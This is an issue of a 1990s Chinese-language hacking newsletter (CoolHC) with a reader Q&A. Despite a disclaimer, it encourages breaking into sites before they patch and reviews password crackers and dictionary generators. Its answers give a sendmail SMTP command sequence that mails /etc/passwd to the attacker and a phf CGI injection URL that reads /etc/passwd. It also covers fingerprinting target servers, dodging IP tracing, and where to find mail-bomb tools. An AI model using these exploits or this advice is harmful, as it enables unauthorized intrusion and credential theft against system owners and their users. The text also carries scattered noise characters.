這不是一個(gè)教學(xué)文件, 只是告訴你該如何破解系統(tǒng), 好讓你能夠?qū)⒆约旱南到y(tǒng)作安全的保護(hù), 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦,我是 CoolFire, 寫(xiě)這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人Crack Password 若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不負(fù)責(zé) !!寫(xiě)這些文章真的花了蠻多時(shí)間的, 我也沒(méi)辦法確定甚么時(shí)候可以寫(xiě)好下一篇, 所以沒(méi)有辦法預(yù)告, 因?yàn)轭A(yù)告不準(zhǔn)的話(huà)會(huì)挨罵的. 以後寫(xiě) CoohHC 的時(shí)間會(huì)少很多的, 因?yàn)楣ぷ髟絹?lái)越多的關(guān)系, 希望大家見(jiàn)諒, 如果一兩個(gè)月才出現(xiàn)一篇的話(huà)也不要罵我喔~ 如果你曾經(jīng)用印表機(jī)把這些文章一篇篇的印出來(lái)的話(huà), 你就應(yīng)該知道寫(xiě)這些東西有多辛苦了,上次在朋友那邊看到, 差點(diǎn)吐血!
7 i" h* v; \/ T事實(shí)上, CoolHC 寫(xiě)到這里已經(jīng)沒(méi)有甚么可以多講的了, 因?yàn)橛泻芏鄸|西并不是用技巧來(lái)破解, 我們所使用的都是系統(tǒng)的漏洞. 而這些漏洞, 有些由於已經(jīng)出現(xiàn)了很久, 所以有些網(wǎng)站也已經(jīng)更新了這些問(wèn)題, 你就沒(méi)有辦法得到你所預(yù)期的結(jié)果了. 除非你能夠在他們 Patch 之前先進(jìn)入, 所以就必需要取得最新的 Bugs 資訊.
' P( R) k: Y7 j. z! Y3 F. P在網(wǎng)路上有很多系統(tǒng)安全討論的 Mail List, 這些 Mail List 討論的內(nèi)容大多與各系統(tǒng)的安全性有關(guān), 所以在討論內(nèi)容上也都會(huì)圍繞著新的 Bugs 打轉(zhuǎn), 如果能夠善加的利用這些資訊, 相信你可以在得到新的 Bug 資料時(shí)就輕易的拿下很多網(wǎng)站的密碼檔案.
( n- R# e9 i5 E0 P+ C) `7 j V所以在這一期的內(nèi)容上, 我們就以如何訂閱這些 Mail List 為主題, 讓大家能夠吸收到這些新的資訊, 這樣也不會(huì)等到 CoolHC 寫(xiě)好的時(shí)候, 大多數(shù)的 Bugs 都已經(jīng)補(bǔ)上了.
) y( B' L) L# Y" `0 j) i4 T**** Crack 工具 ****; Z: I, {( G4 m7 G
[JackAss V1.1]
& c' I) C* m' Z, d6 C- p; W) z許多網(wǎng)友最喜歡的就是這一篇了, 所以這一篇好像是少不了的, 但是軟體更新的速度事實(shí)上可能沒(méi)有我們的文章快. 上次介紹的 John the Ripper 1.3 大家用了覺(jué)得如何???有沒(méi)有甚么大問(wèn)題呢? 應(yīng)該還不錯(cuò)吧! 這次要介紹的是 JackAss V1.1 是我剛在國(guó)外網(wǎng)頁(yè)上抓回來(lái)的, 也不知道出現(xiàn)了多久, 看一下檔案日期是 4-09-96, 好像已經(jīng)出來(lái)很久了, 都沒(méi)有注意到它的存在.8 t& y1 i7 T' d2 I' }- K9 | N W
一般我們以 CJack 來(lái)破解密碼檔案的時(shí)候, CJack 是以呼叫字典檔, 然後逐字加密再進(jìn)行比對(duì)的方式來(lái)作解碼的動(dòng)作, 所以并不是所有的密碼都找得到, 所以就有人想出以暴力的方式來(lái)解碼, 前題是機(jī)器夠快, 然後時(shí)間夠多, 才能避免浪費(fèi)掉很多系統(tǒng)的時(shí)間.CJack 在設(shè)計(jì)的理念上就是這樣, 所以基本上還是略顯不足, 所以才會(huì)有很多的輔助工具出現(xiàn), 像先前幾篇我們所介紹的 KOS 就是一個(gè)例子.
0 o9 x) B4 W$ b( p JackAss 基本上是一個(gè)輔助 Jack 的工具, 跟 KOS 一樣, 需要有 CJack 才能夠執(zhí)行,他的英文注解是: Add On For CrackJack, 與 KOS 不同之處是: KOS 對(duì) CJack 的不足處作了補(bǔ)強(qiáng),讓 CJack 可以跑出一些大小寫(xiě)數(shù)字混合的密碼, 而 JackAss 則是一個(gè)完全不同的方式, 他不需要使用任何的字典檔, 因?yàn)樗旧砭褪且粋€(gè)字典檔產(chǎn)生器. 當(dāng)你使用 JackAss 來(lái)作為 CJack 的前導(dǎo), 執(zhí)行 JackAss 之後他會(huì)依照你的選項(xiàng)來(lái)制造出字典檔, 然後再呼叫 CJack 來(lái)跑這些字.試了一下 JackAss 似乎功能上不怎么樣, 有點(diǎn)類(lèi)似國(guó)內(nèi)上次出現(xiàn)的那支密碼破解程式,不過(guò)速度上倒是比較快, 如果你是要用暴力法來(lái)破解, 又有幾臺(tái)不錯(cuò)的機(jī)器, 你可以試著在不同的機(jī)器上跑, 這樣速度會(huì)快一點(diǎn), 如果單用一臺(tái)機(jī)器要跑暴力法, 可能就很累了. 當(dāng)然, 如果你可以只跑單一 User 的話(huà), 速度會(huì)快一點(diǎn), 所以我建議拿 JackAss 來(lái)跑 root 的部份, 其它的用 GlobalKOS 來(lái)跑字典法就行了~~ 不要那么累!
5 J, D8 A, ?& ~; y" j L( m& v 之前在 tw.comp.security 看到有幾位網(wǎng)友在討論解碼的文章, 其中有一位網(wǎng)友的觀點(diǎn)跟我的有點(diǎn)相像, 他的說(shuō)法是: 將所有的字典檔先編碼, 存成一個(gè)大型的資料庫(kù), 當(dāng)你抓回密碼檔的時(shí)候, 直接用密碼檔來(lái)作逐行的比對(duì), 這樣速度上會(huì)快一點(diǎn), 因?yàn)槭∪チ司幋a的時(shí)間. 如果有人要作這樣的程式的話(huà), 我想應(yīng)該要有一個(gè)不小的硬碟, 用來(lái)儲(chǔ)存這個(gè)完成後頗大的資料庫(kù), 然後查詢(xún)方面最好是用 SQL 來(lái)作查詢(xún), 速度上應(yīng)該會(huì)快一點(diǎn)因?yàn)樵谄渌牟樵?xún)方法上, 如果資料庫(kù)非常龐大, 可以系統(tǒng)跑起來(lái)會(huì)像當(dāng)機(jī)一般吧?? 再者機(jī)器的速度應(yīng)該也要夠快, 最好呢, 能夠?qū)懗鲆粋€(gè) CGI 來(lái) Call 這支程式, 讓大家可以在網(wǎng)頁(yè)上丟出 passwd 檔來(lái)查詢(xún), 再將查詢(xún)完的結(jié)果寄回電子郵件信箱中. 這看起來(lái)好像有點(diǎn)神話(huà), 其實(shí)這很容易作到的, 只是沒(méi)有人真的這樣作, 是嗎?? 目前還沒(méi)預(yù)估過(guò)這樣作所須要的主機(jī)配備, 大家有空的時(shí)候幫忙想一想吧??
! ]( P2 ^6 }" j$ ]( n7 b [WordList V1.0]. i' l# f9 U2 f" f. m0 w
這個(gè)程式是一支字典檔產(chǎn)生器, 他能產(chǎn)生五個(gè)字的字典檔, 就是排列組合啦~ 也沒(méi)有用甚么特殊的方法, 使用他來(lái)產(chǎn)生字典可以產(chǎn)生一個(gè)相當(dāng)大的字典, 不過(guò)速度上相當(dāng)?shù)穆褪橇? 這種程式所產(chǎn)生的字典有點(diǎn)暴力, 因?yàn)樗静灰勒兆值涞姆绞絹?lái)產(chǎn)生, 但是所產(chǎn)生的字也就相當(dāng)?shù)目捎^, 不過(guò)只要密馬是五個(gè)字的, 都一定逃不過(guò)~ 屬於暴力法的一種. 速度慢? 慢到甚么程度呢? 你親自的試一下就知道了, 我跑到一半就把它停掉了,不曉得是用甚么語(yǔ)言寫(xiě)的, 還 For Win 3.x/95, 純 DOS 下無(wú)法執(zhí)行. 除了速度慢的缺點(diǎn)之外, 這支程式所跑出來(lái)的字典檔是五個(gè)字的, 我覺(jué)得真對(duì)五個(gè)字的密碼來(lái)作解碼是有點(diǎn)暴力, 不過(guò)大家應(yīng)該把自己的密碼弄長(zhǎng)一點(diǎn), 因?yàn)橹拔移平獾囊唤M密碼, 居然有人用一個(gè)英文字元來(lái)當(dāng)密碼, 系統(tǒng)管理人員應(yīng)該將密碼設(shè)定最少四個(gè)字元, 這樣密碼才不容易被人盜用, 不然就將系統(tǒng)安全作得好一點(diǎn), 不要讓人輕易的拿到 passwd 檔.
7 f+ M0 J% m/ N$ ? u, W[Q1]) L. u& e; l( E* M
我一進(jìn)去的目錄是"/",我用ls指令後都沒(méi)有看到資料夾,有沒(méi)有可能是把/etc/passwd隱藏了呢?我進(jìn)去時(shí)先出來(lái)的畫(huà)面: 220 flag12 Microsoft FTP service (Verision2.0)我又用了anonymous.ftp.這兩個(gè)username進(jìn)去,也成功了而且目錄也都一樣,那有沒(méi)有可能passwd不放在這里?, p1 V$ p- N2 `
[A1]因?yàn)橐话阄覀冊(cè)谡?password 檔的時(shí)候, 我們測(cè)試(實(shí)作)的 Server 都是使用 Unix 的 Server來(lái)作, 所以我會(huì)寫(xiě)是 /etc/passwd, 照你這個(gè)情況看來(lái), 你進(jìn)入的 FTP Server 應(yīng)該是 WindowNT 的系統(tǒng)(我也沒(méi)有把握能夠確定這件事), 如果是這樣的狀況的話(huà), 一般的 WinNT系統(tǒng)是不會(huì)有 /etc 這個(gè)目錄的, 自然也就無(wú)法用 ls 指令看到了!
3 X& @0 p e7 Y9 y I1 |[Q2]我覺(jué)得知道某人的IP又能怎樣呢? 現(xiàn)在ISP都是使用不固定的IP呀? 若你說(shuō)有紀(jì)錄呀?可是像我使用非自己的或是免費(fèi)的呢?像我的網(wǎng)頁(yè)就有告訴人家免費(fèi)上網(wǎng)(中研院提供的)查到IP也沒(méi)用呀?為何還需要用E-mail bomb 的隱密IP呢?我實(shí)在想不通, 可以告訴我嗎?5 g( x8 u0 M8 p8 _( e
[A2]對(duì)呀!! 但是如果該主機(jī)可以查出該 IP 的確實(shí)上線(xiàn)時(shí)間 (有 Log 檔可查)另外也可以再經(jīng)由電信系統(tǒng)查甚么時(shí)候撥到哪支電話(huà)的電話(huà)號(hào)碼, 循線(xiàn)就可以逮到你了~ 但是現(xiàn)在電信局不太管這樣的事, 不過(guò)如果你犯了很大的錯(cuò), 有檢察官要求他們查, 你說(shuō)查不查得到 ????? IP 固不固定又很重要嗎 ??? 還是能 Fake IP 是最好的~~ 把 Ping關(guān)掉??呵呵~~ 想通吧!# H1 p, P y0 B. h6 \3 d: _
[Q3]1.I can't download KeyPro Emu'. I think the location is wrong. Can you send itto me?
7 e. j7 ~% r0 ]3 X. u3 d2.嗨...,UpYours3還是傳不下來(lái)...能否告訴我其他地方哪里有? or用別的方法寄來(lái)?(真的!沒(méi)騙你,我每次下載到1.xMB時(shí),就會(huì)卡住,都不動(dòng)了...)
: H: \: v" ]) W( D( b# Z% ?4 @[Q7]
# n# e2 e2 B8 F' R0 {9 D/ Y你知道嗎?news上俞煌男有寫(xiě)一個(gè)程式是sendmail 收到password to you know?你是否也有同樣的program?and letmein 2.0不知進(jìn)展如何?
- f P; @- U6 Y8 d[A7]呵呵~~ Know How 是不是?? 其實(shí)要看他寫(xiě)出來(lái)的東西是針對(duì)哪個(gè) Sendmail 版本啦, 像很多版本的 Sendmail 都有被人家抓出一些 Bug 出來(lái), 那也要看這個(gè) Bug 的危險(xiǎn)性到甚么程度,一般這些東西都會(huì)有人整理出來(lái), 但是如果 Mail Server 使用的剛好不是Bug 有列出來(lái)的話(huà), 你可能也沒(méi)有辦法了吧?? 我舉一個(gè)很久以前在 Bugtraq 上面看到的 sendmail bug 來(lái)作說(shuō)明好了, 這個(gè) Bug 的版本我忘了, 好像是 sendmail 5.6 的吧(很久了), 現(xiàn)在不曉得還有沒(méi)有人在用這個(gè)版本, 如果有的話(huà), 就算他倒霉好了! 是這樣的, 這個(gè)版本的 Sendmail 可以讓人執(zhí)行一些指令, 所以我們可以利用這個(gè)漏洞把passwd 檔寄給自己, 而連到 smtp 就可以控制 sendmail 來(lái)發(fā)信了!" t0 J7 g9 X" B+ {+ O+ y
telnet xxx.xxx.xxx 256 S( m5 a4 H1 a }; y4 L8 b
helo MyDear
/ b: [6 p# K- {0 x H' Email from: "|/bin/mail me@myhost </etc/passwd"' z7 w7 P& {6 N4 T
rcpt to: me@myhost% a% [9 o0 Q* z
data
) L4 M7 X: A4 p6 g, m( M1 zthis is a test mail .
- O- i5 {- w: B* x像這樣就可以讓這臺(tái)主機(jī)把他自己的 /etc/passwd 寄給我了, 但是也要看他有沒(méi)有提供mail這支程式, 有沒(méi)有放在 /bin 目錄, 像這目錄也是很重要的, 有的例子我舉出來(lái)像cgi hole 我是舉例他放在 /cgi-bin 目錄, 但有些人的目錄名稱(chēng)是 /cgi 或 /bin 或/exe 就沒(méi)有人會(huì)變通, 一直寫(xiě)信來(lái)問(wèn)我, 為甚么照這個(gè)指令沒(méi)有辦法抓到... 等等, 很難講啦, 誰(shuí)曉得他們目錄命名的方式,都是隨人家高興的嘛~~
: U- m4 i6 z. X5 l& h9 n 不過(guò)像你所講的, 把這種 Bug 寫(xiě)成程式來(lái)抓 passwd 檔, 那是不是要針對(duì)很多版本的sendmail 都要有判斷? 再針對(duì)每個(gè)版本送出不同的指令? 如果真的可以寫(xiě)出來(lái)這樣的程式的話(huà), 那一定是很不錯(cuò), 不過(guò)這應(yīng)該還只是一個(gè)理想吧?? 俞兄如果有寫(xiě)好的, 請(qǐng)寄送一份給小弟, 我倒想看看程式可以強(qiáng)到甚么程度. 還有, 并不是每個(gè) sendmail Bug 都是連上 smtp 就可以作了, 有些還要寫(xiě)一些小程式 (Scripts) 才跑才有用, 也就是說(shuō)你必需要有一個(gè) login 到該 server 的帳號(hào)才行.... 所以..... 難說(shuō)啦!
, M4 O7 e% e9 a
3 H4 z- U9 d; U- f4 v[Q8]3 G7 w& Y) _5 C2 _
I already download avalanche v2.8 mail bomber,but I can't send it! When I start send the bomb massage,why always receive 553 error ot other error?can you help me how to seng it! 8 {, F! |8 o( p: H( ]; c
[A8]有些 MailBomb 我并沒(méi)有實(shí)際的測(cè)試過(guò), 因?yàn)榉N類(lèi)實(shí)在太多了, 現(xiàn)在好像越來(lái)越多人喜歡寫(xiě)這種程式, 如果你有類(lèi)似的問(wèn)題, 可以到我們首頁(yè)上的留言版發(fā)問(wèn), 相信有用過(guò)的網(wǎng)友會(huì)提供你一些設(shè)定上的建議, 讓你的程式能夠正常的運(yùn)作.* C7 \0 z- N' T( {9 B7 X
[Q9]Hi, I read your hack homepage, it's very good. Do you know any BBS or sitesabout system security & hacking? They are always underground, I can't findthem.Thanks alot.& Z+ r. [' I6 u- F7 I3 \
[A9]目前中文的 Hack Homepage 大多都是關(guān)於軟體注冊(cè)碼的網(wǎng)站, 有些網(wǎng)站現(xiàn)在也會(huì)提供一些關(guān)於破解主機(jī)方面的資訊, 我們將在首頁(yè)上建立一些網(wǎng)頁(yè)的連結(jié)點(diǎn), 讓網(wǎng)友們可以到其它的網(wǎng)站上看看其它的破解資訊, 如果你有建立一個(gè)相關(guān)的網(wǎng)頁(yè)的話(huà), 請(qǐng)寫(xiě)信給我,我會(huì)將你的網(wǎng)頁(yè)加入我們站上的連結(jié). 至於 bbs 的話(huà), 各大專(zhuān)院校的 bbs 應(yīng)該都有Hacker 區(qū)的討論, 目前國(guó)內(nèi)以交大資工的 Hacker 區(qū)資料最為豐富, 你有空也可以上去看看. bbs.cis.nctu.edu.tw
9 G N% t* H$ |. d7 _6 A& g. [[Q10]很冒昧的打擾你�,小弟拜讀你的大作中 coolhk2 時(shí)�����,便實(shí)地的操練了一下�����,當(dāng)小弟在瀏覽器中下達(dá)∶$ j, q/ A6 n7 ^
ada99:xxxxxx\cgi-bin\nph-test-cgi@_2A 7 L- p+ j5 C5 e- a9 ]
後��,誠(chéng)如你所說(shuō)的一份報(bào)表出來(lái)如下∶ 3 c G. f6 B$ c) n2 V8 i" k s3 L
CGI/1.0 test script report:
: l. ?) H5 r' ?6 l0 _argc is 1. argv is \*.- O5 p- k: Z8 i
SERVER_SOFTWARE = Apache/1.0.0+ c! j" L5 w! O1 Q: z/ V9 {, x
SERVER_NAME = auto.nypi.edu.tw
$ f& g+ I. Y+ [% R. oGATEWAY_INTERFACE = CGI/1.1+ R( i* L2 v) e4 \2 g; ~4 i& v
SERVER_PROTOCOL = HTTP/1.0
4 E: |' C! O( {. _+ qSERVER_PORT = 80% L) [; Y9 d: ^, R* @3 M
REQUEST_METHOD = GET6 b! ^' Y. U" C' ^. F" C) e. W
HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,*/*. }5 U- Q7 C( ^6 ^1 J6 E F+ \7 n
PATH_INFO =
9 p) M& s/ ?$ i9 u BPATH_TRANSLATED =
$ {% G/ Y7 @- f* ?- tSCRIPT_NAME = /cgi-bin/nph-test-cgi& D5 E2 c H( M$ Y$ ~$ c# y. r
QUERY_STRING = 2 Count.cgi acc acc.c archie calendar count date discuss doit.cgi dopost.c 8 `5 E% i0 ]1 A4 R* e1 m( j
finger fortune guestmsg guestmsg.c imagemap jj move.pl nph-count nph-test-cgi phf post-query 6 g7 @5 A9 [7 T/ ^5 s4 B
post.c query ranking re.c repost.c repost.c.bak test-cgi test-cgi.tcl uptime vote.pl wais.pl, x0 U [ J5 G: L0 D6 E
REMOTE_HOST = 140.130.1.218# q1 O; h6 _4 c* {% z& t
REMOTE_ADDR = 140.130.1.218
& t, M' t$ H1 {REMOTE_USER =; v6 G' {5 k0 X5 G0 _. W, v: u9 p
CONTENT_TYPE = ) ^& d6 b% C' W
CONTENT_LENGTH =
( Z0 r Z0 l2 D但是當(dāng)小弟再接著輸入∶
6 N# {( B9 m1 o3 c/ C @http://xxxxxxxx/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd: `6 K% s t: U6 Y9 h- V
可是卻沒(méi)有 passwd 出現(xiàn),僅出現(xiàn)如下∶+ Q2 L5 N& k' l1 C" E1 L3 t
Ⅰ. $ y; h& [/ f$ b U9 P. c& ~7 e. y- ^
Server Error
4 q3 j& `* w3 k9 e9 k4 L1 @" _The server encountered an internal error or misconfiguration and7 U. ^: g& m$ I. P8 Z4 }9 a. m7 @
was unable to complete your request.. t2 L! h- A. b7 x
Please contact the server administrator, allen@auto.nypi.edu.tw and
+ m7 N% x' z$ F% C8 s( u; Kinform them of the time the error occurred, and anything you might have9 M# C& B- A9 [* a: v* @" Z
done that may have caused the error.
4 H, P x0 D( O# k( M5 iⅡ.
?4 @- f% ~+ q& c( `Query Results
, I9 z/ u7 ?. Y& k% p4 u/usr/local/bin/ph -m alias=x less /etc/passwd
# C1 I5 \- g1 ?6 C, }5 e& t上面的 Ⅰ及Ⅱ 是小弟分別在不同的站所試出的結(jié)果��,請(qǐng)問(wèn)一下為什么會(huì)如此呢��,是不是小弟指令下錯(cuò)了或者是該站的軟體已經(jīng)把 bug 給 patch 過(guò)了,謝謝你��! A$ ~( c T% _
[A10]正如你所說(shuō), 可能這個(gè)站臺(tái)已經(jīng)把他們的 httpd Patch 過(guò)了, 所以沒(méi)有辦法拿到, 也不一定要用 less 指令, 也可以用 more, cat 等指令來(lái)試看看, 你上面所下的指令應(yīng)該都正確才對(duì),如果真是已經(jīng) Patch 過(guò)了的話(huà), 就只好試試看系統(tǒng)有沒(méi)有其它的漏洞羅.這個(gè)漏洞主要是系統(tǒng)所提供的 phf 的 bug, 有些主機(jī)在 test-cgi 的 Report 上的 QueryString 那一行沒(méi)有 phf, 也就表示這臺(tái)主機(jī)沒(méi)有提供 phf 這個(gè) cgi 讓你使用, 也就沒(méi)有辦法用這個(gè)方式來(lái)取得 passwd 檔了.% A7 }" F+ @0 ?+ N0 S3 o
# i( R, }5 u C) A; j# b* q6 U! {
[Q11]1. Can you tell me how to find the KOS file by YAHOO.The best of idle is tellme the FTP site.Thank you. :)
2 q9 Z _# W q2.我給您發(fā)完信后�,想從您的首頁(yè)上拉個(gè)CJACK14下來(lái)�,發(fā)現(xiàn)上面好象沒(méi)有耶 我點(diǎn)取了那個(gè)名字�,可是報(bào)告說(shuō)沒(méi)有這個(gè)文件��。 (~~~~~~~~~~~~不會(huì)是沒(méi)有吧% Y i7 M+ X! j
[A11]你現(xiàn)在已經(jīng)可以在 ftp.cads.com.tw/pub/security 中拿到這個(gè)檔, 這是由網(wǎng)友 Robin所提供的ftp, 站臺(tái)上許多程式都可以在這里抓到. 如果你在我們站臺(tái)上抓不下來(lái), 請(qǐng)到這里試試, 如果你想在 Yahoo 上找的話(huà), 尋找 globalkos 這個(gè)關(guān)鍵字, 可以順便連到國(guó)外的站臺(tái)看看他們擺了哪些東西, 亦可順便學(xué)點(diǎn)東西喔~~
: @6 i. l# l5 c( j k' c' w[Q12]Can you tell me how to check infomation of host? How to know the FTP serverand MAIL server?
# N$ n4 Z" D/ b g" a6 C) p/ S: N[A12]對(duì), 有很多網(wǎng)友來(lái)信詢(xún)問(wèn)如何破解某某站臺(tái), 如何破解.... 都沒(méi)有順便說(shuō)明一下你們想破解的系統(tǒng)是屬於哪種系統(tǒng), 先教大家看一下系統(tǒng)名稱(chēng), 你只要 telnet 進(jìn)入, 當(dāng) Unix提示符號(hào)出現(xiàn)的時(shí)候, 用 uname -svrmn 就可以看到了, 各選項(xiàng)代表的意義如下說(shuō)明:
2 u+ Z* d: q. C" n9 D, }8 J-s: Show System Name, -v: Show Operating Version, -r: Reveals The Software Release Level-m: Identifies The Machine Hardware For You -n:The node name of the computer is revealed
4 c# S* R7 w, u& \8 T9 x! S4 Z5 Z另外再來(lái)說(shuō)明一下如何看 Sendmail 版本, 我們只要連到 Port 25 就可以看到了, 如: ' Y; G* u$ U+ u9 j" D9 T
telnet ms1.xxxxxxxxx.xxx.tw 25" `) a$ u2 j) {' m
220 ms1.xxxxxxxxx.xxx.tw Sendmail 5.65v3.2 (1.1.8.2/30May97-0801PM) Fri, 6 Jun 1( C9 N- w' o- e, [
997 11:38:23 +0800 & z$ I2 S, s3 b' w
至於 ftp 呢? 你只要連上 ftp 就應(yīng)該會(huì)在畫(huà)面上看到他的版本名稱(chēng)了, 如:
! @, k* t K5 K& _' @C:\WINDOWS>ftp ftp.xxxxxxxxx.xxx.tw
2 J3 D7 O9 G4 M4 @Connected to ftp.xxxxxxxxx.xxx.tw.
* W! L+ u2 b1 C# a' ?& D220-Serv-U FTP-Server v2.2 for WinSock ready...: J) {8 ?8 |7 ]" S' r
220-Welcome to xxxxxxxxxxxx xxx Ftp Server(ftp.xxxxxxxxx.xxx.tw).1 S) w9 E+ Y( m' Y9 v
220-From xxx.xx.xxx.xx
! C8 {5 n$ q* h, }8 [: G[Q13]請(qǐng)問(wèn)你能否告訴我如何制造mail bomb,因?yàn)樽罱鲜鞘盏綇V告信或者有的沒(méi)有的,實(shí)在很
: u" u; B0 _1 T2 h! p4 ~4 g/ ~$ _討厭.
4 H9 M4 ~" O- }" W6 ^4 v6 i[A13]首頁(yè)上有一堆Mail Bomb 的程式, 你需要的只是把他們抓下來(lái), 然後在電腦上跑就行了,當(dāng)然里面也都有說(shuō)明檔之類(lèi)的文件. 在收到廣告信件的時(shí)候, 請(qǐng)不要一昧的回信, 因?yàn)橛行┌l(fā) MailList 的人, 對(duì)系統(tǒng)的運(yùn)作并不 解, 有時(shí)可能是利用在帳號(hào)目錄設(shè) .foward的方式來(lái)發(fā)信的, 而信件中的 Reply to: 欄位填的也是該帳號(hào), 當(dāng)遇到這種情況的時(shí)候,你所發(fā)的信會(huì)讓所有在這個(gè) MailList 的人都收到, 如果所有的收件人都回這封信的話(huà),那你的信箱一定就爆爛了! 所以要先冷靜的分析一下這封信的發(fā)法, 會(huì)不會(huì)傷害到別人,再?zèng)Q定要怎么辦, 千萬(wàn)別亂炸!~ MailBomb 也會(huì)害到自己的, 切記~ # H8 I; }. k7 M
[Q14]您好����!我是XXXXXXXXXXXXXXXXX?�?���!對(duì)於您寫(xiě)的TXT2DIC 有一點(diǎn)問(wèn)題����!為什么所建的密碼檔PASSDICT不會(huì)增加�����!只是每增加一次字典����,PASSDICT會(huì)隨著不同���!
' r% o- x* x9 O' i' s[A14]TXT2DIC 的產(chǎn)生方式會(huì)覆蓋掉舊有的檔案, 所以請(qǐng)?jiān)谑褂玫臅r(shí)候使用不同的檔案名稱(chēng),目前最新的 TXT2DIC V1.2 也還沒(méi)有使用 File Append 的方式, 所以仍然會(huì)將舊檔案覆蓋, 若你不想覆蓋舊檔, 請(qǐng)使用不同的檔名來(lái)進(jìn)行轉(zhuǎn)換! 否則程式將不會(huì)給你任何的警告就把檔案蓋下去了!
; ~$ y2 x M' O- m) a' K6 r9 E 4 V' r# D, M8 L0 E7 a
[Q15]在網(wǎng)路閑逛時(shí)發(fā)現(xiàn)FETAG Software's Hacking Page像發(fā)現(xiàn)寶一樣的下載了Coolhc#1-6���,在以前電影、小說(shuō)所描述的駭客情節(jié),以為只有在外國(guó)才有的事����,想不到在臺(tái)灣已有人在這片領(lǐng)域默默的耕耘�,雖然我不是很聰明但還是很有興趣的想出點(diǎn)力�。拜讀你的大作似乎有點(diǎn)意猶未盡,想請(qǐng)教你什么時(shí)候再出第七集����,坊間有什么中文的入門(mén)書(shū)可參考的�。還有想當(dāng)一個(gè)駭客族會(huì)不會(huì)很難��。
% b8 Z8 G+ R1 ]* `) Y7 s[A15]謝謝你的鼓勵(lì), 7 跟 6 之間的確是隔了很久, 且這一篇也沒(méi)有講到甚么東西, 有點(diǎn)對(duì)不起大家的等待了. 若想要學(xué)入侵, 希望各位能多看一看 Unix 方面的書(shū), 先將 Unix 的指令讀熟, 最基本的當(dāng)然就是 Shell 指令, 再來(lái)就是學(xué)著寫(xiě)一些簡(jiǎn)單的 Shell Script,若沒(méi)有馀力自己找系統(tǒng)的漏洞, 又想要破解站臺(tái), 建議要多看看一些系統(tǒng)安全的 MailList, (好多老話(huà)重談), 這一篇就針對(duì) Mail List 的部份, 有簡(jiǎn)單的介紹, 讓大家對(duì)這些系統(tǒng)安全的 Mail List 有些 解, 進(jìn)而多吸收一些知識(shí). * l8 O' y/ ^& \
[Q16]我想請(qǐng)問(wèn)一下����,我是用Browser抓/etc/passwd的, 面root的密碼是被編過(guò)碼的嗎���?我用Crack Jack 1.4解碼���。但是好像不行����,到底要用什么解才對(duì),一下用Crack Jack,一下又用Brute���,我都看不懂��,還有就是UltraEdit是什么���?Pass2Dic有用嗎?還有我用NetTerm 4.1版for win31可是ftp or sendmail好像都進(jìn)不去�����,是什么原因呢���?另外就是我用CuteFtp 1.8版���,Login設(shè)anonymous or Double�����,ID和passwd都空白���,但是為什么就可以進(jìn)Ftp,然後用NetTerm卻進(jìn)不去? 還有KOS(1.?M)的不會(huì)用�����。
. _- b% h- v7 Q: B7 Q% g1 ^' g[A16]好多問(wèn)題喔~ 我一一的簡(jiǎn)短回答:[1]要看 Passwd 是否是編碼過(guò)的, 在 CoolHC#1 中就有說(shuō)明, 我沒(méi)有親眼看到 passwd 檔, 沒(méi)有辦法回答. [2]CrackJack 跟 Brute 都是功能相同的程式, CrackJack 速度比較快, 請(qǐng)你先看一下 CoolHC1~6 之後再發(fā)問(wèn), 因?yàn)橛泻芏鄸|西都是寫(xiě)過(guò)的了! [3]UltraEdit??? 文書(shū)編輯程式, 我用它來(lái)寫(xiě) Home Page [4]Pass2Dic在 CJack 上已經(jīng)有選項(xiàng)了, 但是在 Brute 之類(lèi)的成式上就用得到. [5]ftp 有提供匿名登入, 但是在 Telnet 沒(méi)有, 所以無(wú)法登入. [6] KOS 的用法也寫(xiě)過(guò)了!
% V t! ]6 O8 |) K6 R* s+ s" a[Q17]when i use txt2dic.exe , i can't use it first, when i go into the third stepit show " incorrect dos version....done!" secondly, when i gp into the fourthstep , it show" have some error on code-62 "what's wrong ?
7 L: I5 E7 F) e. X9 X; o[A17]第一個(gè)問(wèn)題, 在第三步驟發(fā)生 Incorrect dos version, 你用的是 1.0 版, 所以需要呼叫到 dos 的 sort 程式, 請(qǐng)使用 1.2 版 (For Win32 only) 就不會(huì)有此狀況了! 二,你發(fā)生 Error 62 的狀況, 這在上一次的 FAQ 中也有講過(guò)了, 請(qǐng)去翻一翻就 解了! 不過(guò)這個(gè)狀況也在 1.2 版改進(jìn)了, 所以建議還是用新的版本, 就不會(huì)有這種狀況發(fā)生了!
* G+ w! R' h/ Z4 W9 N* N9 @[Q18]When I get a passwd file which is shadowed....Please tell me how to do....9 r( k$ [3 f0 _% `. {1 ~
[A18]如果我跟你講, 無(wú)解呢?? 有些 shadow 過(guò)的檔, 只要你有辦法抓到另外一個(gè) shadow 檔是有辦法解開(kāi)的, 但是單要使用 shadow 過(guò)的檔, 我不相信有人能夠解開(kāi)~ 所以還是要抓到另一個(gè)來(lái) "配對(duì)" 才有用! 至於如何抓到 shadow? 很多人都有這樣的問(wèn)題, 那就要看系統(tǒng) "提供" 的漏洞多不多了, 不然它 shadow 也就沒(méi)有意義羅! ) b& K3 d6 L0 H" Z8 c+ n
[Q19]First of all, I'd like to give you some feedbacks about your page.I'm not in Vancouver. I always encounter the slow transfer rate with manyTaiwanese sites. I only got 30 bytes/sec with your site. I don't know thereason... Anyway, you are the first Chinese hacking page I've ever seen.I like that. I just want to learn more. Could yu give me some Chinese hackingpages' addresses? I will be glad to visit them. By the way, I'm not intersetedin emailbombs, because they hurt others. But I'm interested in defensing andcracking emailbombs. I hope you can update your page oftenly. Thanks a lot!
( u! V/ `" O( Q" n$ v2 R4 S[A19]謝謝你, 我們會(huì)盡量的更新我們的網(wǎng)頁(yè), 至於其它中文的類(lèi)似站臺(tái)??? 嗚... 你們?cè)谀睦镅?? 快點(diǎn)現(xiàn)身吧!! 如果大家有找到新的類(lèi)似站臺(tái)的話(huà), 寄得趕快寫(xiě)信來(lái)告訴我呦~
0 R( P; p: y0 ~, E2 T4 R/ Y[Q20]請(qǐng)問(wèn)我ISP的OS是SunOS5.4����,我用貴站上的方法不好用了,用貴站關(guān)于shadow的link上提到的也不成了���,要如何取得其shadow過(guò)的passwd呢���?請(qǐng)賜教,多謝�����!
